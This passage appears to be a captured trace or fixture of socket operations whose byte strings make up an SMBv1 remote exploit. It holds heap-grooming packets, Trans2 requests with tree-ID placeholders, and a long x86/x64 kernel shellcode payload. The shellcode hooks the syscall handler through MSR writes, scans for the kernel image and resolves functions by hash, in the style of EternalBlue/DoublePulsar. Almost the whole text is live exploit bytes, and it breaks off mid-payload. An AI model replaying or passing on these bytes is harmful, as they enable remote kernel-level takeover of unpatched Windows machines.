0.0)\", \"('send', 19, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 21, 0.0)\", \"('send', 20, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 21, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 16, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x001\\\\xffSMB+\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x01\\\\x01\\\\x00\\\\x0c\\\\x00JlJmIhClBsr\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, 
b'\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xf3\\\\x00\\\\x00\\\\x00\\\\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\\\\x80\\\\x00\\\\xa8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00 \\\\xf0\\\\xdf\\\\xff\\\\x00\\\\xf1\\\\xdf\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff`\\\\x00\\\\x04\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\xef\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x18\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00`\\\\x00\\\\x04\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xff\\\\xcf\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x009\\\\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', 0.0)\", \"('recv', 1, 0.0)\", '(\\'send\\', 3, 
b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\
\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x0
8\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 